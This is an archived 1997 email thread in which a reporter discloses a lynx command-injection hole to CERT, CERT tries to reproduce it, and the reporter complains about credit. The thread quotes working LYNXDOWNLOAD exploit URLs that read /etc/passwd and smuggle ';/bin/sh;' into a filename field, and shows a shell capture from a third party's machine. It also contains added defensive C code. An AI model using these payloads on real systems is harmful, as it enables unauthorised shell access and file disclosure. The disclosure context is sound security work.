Here's basically what happened (as I see it):
1) I told CERT about it; they tried some crazy nonsensical things to get it
to work that the average Unix user would know don't work.
2) They got the hole to work locally but they didn't appear to realize it was a
hole (and I thought security profs would).
3) They posted it to the lynx-dev list, which is open (I think), and by
doing that they released the hole to the public. (I thought that
CERT was supposed to keep holes under wraps until they get them fixed.)
4) They posted a VB that had a 'workaround' that didn't actually solve the
problem. (Even if you can't 'g' to a URL you can still hit '?' or 'v'
depending on the version and if bookmarks are on and usually get to
Yahoo. You can enter URL tags at a Yahoo search prompt and force
a LYNXDOWNLOAD.) Plus, I said that at the end of my first letter to
them.
I'm really let down by CERT. From now on I'm posting straight to bugtraq.
To CERT: I told you about this hole. Without me, you wouldn't have known,
and the least you could do is give me the credit I deserved.
-------------------------------------------------------------------------------
From dynamo@ime.net Thu Jul 17 22:52:48 1997
Date: Fri, 13 Jun 1997 13:57:01 -0400 (EDT)
From: dynamo@ime.net
To: cert@cert.org
Cc: brent@ime.net
Subject: Hello, I believe youll find this interesting.
I spoke to one of your people on the phone today, and she said pretty
much that if you provide info that you guys don't already have, you
would give credit to the person who told you inside the advisory. With
that in mind, I would like to tell you about something I've noticed. It
relates to universities and WAIS systems that use lynx in order to display
pages. If you feed lynx a URL like:
LYNXDOWNLOAD://Method=-1/File=/etc/passwd/SugFile=/dev/stdin
on many systems it will show you their file; on a surprisingly large
number of systems there is no shadow. Sometimes you can't use /dev/stdin
and you need your tty or some other place. Now, because this calls
system() (I think... I didn't check the source)
LYNXDOWNLOAD://Method=-1/File=;/bin/sh;/SugFile=/dev/stdin
also works and gives you a shell prompt. I believe that this is a real
problem for many universities out there.
Now, if someone cannot (g) to a random URL, they can
usually maneuver to Yahoo... and from there get a link redirector to go to
these sites in <a href="">a</a> format. Note: this pretty much makes
disallowing lynxexec: and file: as well as (g) useless.
Thanks,
dynamo
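As an added illustration (not code from this thread, and not lynx's own source), here is the pattern the report describes, a user-supplied filename spliced into a system() command line, beside the exec-without-shell form and a conservative check on the suggested-filename field; the function names and the /tmp paths are mine.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* The pattern the report attributes to lynx: a user-supplied name spliced into a shell command. */
int unsafe_copy(const char *src, const char *dst) {
    char cmd[4096];
    snprintf(cmd, sizeof cmd, "cp %s %s", src, dst);
    return system(cmd);   /* /bin/sh parses cmd, so ';' in src is shell syntax */
}

/* Hardened form: exec cp with an argv array and no shell; ';' is just a byte in a filename. */
int safe_copy(const char *src, const char *dst) {
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *const argv[] = {"cp", "--", (char *)src, (char *)dst, NULL};
        execvp("cp", argv);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Defence in depth for the suggested-filename field: conservative charset, no path components. */
int filename_is_safe(const char *name) {
    static const char ok[] = "abcdefghijklmnopqrstuvwxyz"
                             "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789._-";
    if (name == NULL || *name == '\0' || *name == '-' || *name == '.') return 0;
    return strspn(name, ok) == strlen(name);
}

/* Round trip through safe_copy with a constructed file whose name contains ';'. */
int demo_roundtrip(void) {
    const char *src = "/tmp/lynxdl_demo;src.txt", *dst = "/tmp/lynxdl_demo_dst.txt";
    char buf[64] = {0};
    FILE *f = fopen(src, "w");
    if (!f) return 0;
    fputs("constructed sample\n", f);
    fclose(f);
    if (safe_copy(src, dst) != 0 || !(f = fopen(dst, "r"))) return 0;
    if (!fgets(buf, sizeof buf, f)) buf[0] = '\0';
    fclose(f);
    return strcmp(buf, "constructed sample\n") == 0;
}
```

With the argv form the ';' in the source name reaches cp as part of one argument, which is exactly what the shell-parsed form cannot guarantee.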
-------------------------------------------------------------------------------
From cert@cert.org Thu Jul 17 22:50:34 1997
Date: Tue, 17 Jun 97 10:22:04 EDT
From: "CERT(R) Coordination Center" <cert@cert.org>
To: dynamo@ime.net
Cc: brent@ime.net, "CERT(R) Coordination Center" <cert@cert.org>
Subject: Re: Hello, I believe youll find this interesting. (INFO#97.19354)
-----BEGIN PGP SIGNED MESSAGE-----
Hi Dynamo,
<dynamo@ime.net> writes:
>pages. If you feed lynx a URL like:
>LYNXDOWNLOAD://Method=-1/File=/etc/passwd/SugFile=/dev/stdin
>on many systems it will show you their file; on a surprisingly large
>number of systems there is no shadow. Sometimes you can't use /dev/stdin
>and you need your tty or some other place. Now, because this calls
>system() (I think... I didn't check the source)
>LYNXDOWNLOAD://Method=-1/File=;/bin/sh;/SugFile=/dev/stdin
>also works and gives you a shell prompt. I believe that this is a real
>problem for many universities out there.
>Now, if someone cannot (g) to a random URL, they can
>usually maneuver to Yahoo... and from there get a link redirector to go to
>these sites in <a href="">a</a> format. Note: this pretty much makes
>disallowing lynxexec: and file: as well as (g) useless.
We tried both of the exploits that you discuss here, and we must be missing
something as we couldn't get either of them to work.
In the first case, what we did was attempt to attack the machine
"www.victim.example.com" from the machine "attacker.example.org" (note the
different domains - these are machines on separate networks).
attacker.example.org % lynx http://www.victim.example.com
{ and within lynx ... }
g
LYNXDOWNLOAD://Method=-1/File=/etc/passwd/SugFile=/dev/stdin
Enter a filename: /usr/users/attacker/tmp/foo
The file "/usr/users/attacker/tmp/foo" contains the password file from
attacker.example.org, not the password file from www.victim.example.com.
The next test we tried was to attack the local machine, to see if we could
read the /etc/shadow file:
attacker.example.org % lynx /etc/shadow
Alert!: Unable to access document.
lynx: Can't access start file file://localhost/{...}/etc/shadow
which would be expected since /etc/shadow is not world readable, and lynx
is not a setuid program.
attacker.example.org % lynx http://www.attacker.example.org
{ and within lynx ... }
g
LYNXDOWNLOAD://Method=-1/File=/etc/shadow/SugFile=/dev/stdin
Enter a filename: /usr/users/attacker/tmp/foo
-- press space for next page --/shadow: Permission denied
Finally, we tried the second exploit you gave above, and the terminal
froze with the following errors:
Saving.....cp: Insufficient arguments (0)
Arrow keys: Up and Down to move. Right Usage: cp [-f] [-i] [-p] f1 f2ack.
H)elp O)ptions P)rint G)o M)ain screen Q)uit /=search [delete]=history cp [-f] [-i] [-p] f1 ... fn d1
cp -r|R [-f] [-i] [-p] d1 ... dn-1 dn
(\!) \h \$
An attempt to use the second exploit with this modified operation:
LYNXDOWNLOAD://Method=-1/File=/dev/null;/bin/sh
also failed to produce a shell.
Is there some other part of the exploit that we have misunderstood? Thanks
for your report -- we look forward to any further pointers you may have.
Regards,
Rob.
| Rob McMillan Email: cert@cert.org
|| CERT Coordination Center (*) Phone: +1 (412) 268 7090 (24 x 7)
||| Software Engineering Institute Fax: +1 (412) 268 6989
|||| Carnegie Mellon University Web: http://www.cert.org
||||| Pittsburgh, Pa. 15213-3890 Timezone: GMT-5 (EST)
* CERT is registered with the U.S. Patent and Trademark Office. The Software
Engineering Institute is sponsored by the U.S. Department of Defense.
-------------------------------------------------------------------------------
From dynamo@ime.net Thu Jul 17 22:53:09 1997
Date: Wed, 18 Jun 1997 21:38:54 -0400 (EDT)
From: dynamo@ime.net
To: "CERT(R) Coordination Center" <cert@cert.org>
Cc: brent@ime.net
Subject: Re: Hello, I believe youll find this interesting. (INFO#97.19354)
Well, first I've gotten it to work. I'm currently away from my house right
now and don't have the machine name on me.. it was a [edited out] machine and I
emailed the person who runs it already. I grabbed this from the email I
had sent him.. I'll give you a bigger list of affected boxes when I get
back.
Here's my screen capture:
[7mSaving.....
[K/bin/cp: missing file arguments
Try `/bin/cp --help' for more information.
bash$ bin dev lib proc tmp
vmlinuz
boot etc lost+found root usr zImage
cdrom home mnt sbin var zImage.mem
bash$
---------------
I'll send you more info in a bit. This does work.
First off, the file you select as SugFile must be writable if you do put
one in; second, all you need to do is disable downloading and this problem
is fixed. I wouldn't have emailed you if it didn't work.
dynamo
-------------------------------------------------------------------------------
From cert@cert.org Thu Jul 17 22:50:47 1997
Date: Thu, 19 Jun 97 17:39:43 EDT
From: "CERT(R) Coordination Center" <cert@cert.org>
To: dynamo@ime.net
Cc: brent@ime.net, "CERT(R) Coordination Center" <cert@cert.org>
Subject: Re: Hello, I believe youll find this interesting. (INFO#97.19354)
-----BEGIN PGP SIGNED MESSAGE-----
Hi,
First, thanks for the feedback.
<dynamo@ime.net> writes:
>Well, first I've gotten it to work. I'm currently away from my house right
>now and don't have the machine name on me.. it was a [edited out] machine and I
>emailed the person who runs it already. I grabbed this from the email I
>had sent him.. I'll give you a bigger list of affected boxes when I get
>back.
>Here's my screen capture:
>[7mSaving.....
>[K/bin/cp: missing file arguments
>Try `/bin/cp --help' for more information.
>
>bash$ bin dev lib proc tmp
>
>vmlinuz
>
>boot etc lost+found root usr zImage
>
>cdrom home mnt sbin var zImage.mem
>
>bash$
>---------------
>I'll send you more info in a bit. This does work.
>First off, the file you select as SugFile must be writable if you do put
>one in; second, all you need to do is disable downloading and this problem
>is fixed. I wouldn't have emailed you if it didn't work.
Understood. We know that you wouldn't have sent us mail if you didn't have
something that you think was worthwhile and needed addressing. Since we've
been unable to replicate the problem that you are discussing, we want to
make sure that we are understanding what you are doing, so that we can
better understand the problem. We're glad that you took the time to advise
us in the first place; our aim is to better understand what you are saying
in case we are missing something.
We tried the exploits again, and were able to get a shell on the local
machine, but not on the remote machine.
Can you send us a typescript (using the "script" command) where you
replicate the problem, executing a "uname -a" on the local machine, and
then when you get a shell on the remote machine, execute a "uname -a" in
that shell? The typescript may show us something that you were doing that
we have missed.
Thanks again for any feedback.
Regards,
Rob.
| Rob McMillan Email: cert@cert.org
|| CERT Coordination Center (*) Phone: +1 (412) 268 7090 (24 x 7)
||| Software Engineering Institute Fax: +1 (412) 268 6989
|||| Carnegie Mellon University Web: http://www.cert.org
||||| Pittsburgh, Pa. 15213-3890 Timezone: GMT-5 (EST)
-------------------------------------------------------------------------------
From dynamo@ime.net Thu Jul 17 22:53:31 1997
Date: Sat, 21 Jun 1997 23:01:03 -0400 (EDT)
From: dynamo@ime.net
To: "CERT(R) Coordination Center" <cert@cert.org>
Cc: brent@ime.net
Subject: Re: Hello, I believe youll find this interesting. (INFO#97.19354)
Okay, now what I attached is something that I sent in email to the admin
of the box that it worked on.. as it worked by accident.. he didn't turn off
downloading like I emailed him that he should... in that case maybe he
didn't get it.. you may want to see if you can contact him.. I've tried
plenty of times and I'm sick of getting my mail bounced back.. after about
10 tries one didn't.. ANYWAY
It's clearly a shell. Note that I did not SEE my command line as I typed it
in, but after hitting enter it did execute. I know it works on a few
other operating systems than lynx. But like I said.. the answer is just
disallowing downloading. I believe there are more internal URLs in lynx
that cause problems. I found this after doing a strings `which
lynx`|less.
So anyway, I hope you get the word out. For credit, "Aaron of Internet
Maine (ime.net)" would be great.
[Part 2, "" Text/PLAIN 40 lines]
[Unable to print this part]
-------------------------------------------------------------------------------
From dynamo@ime.net Thu Jul 17 22:53:53 1997
Date: Sun, 22 Jun 1997 02:08:20 -0400 (EDT)
From: dynamo@ime.net
To: "CERT(R) Coordination Center" <cert@cert.org>
Cc: brent@ime.net
Subject: Re: Hello, I believe youll find this interesting. (INFO#97.19354)
On the same bug I was talking about...
Oh, on another note.. what if someone did something like this: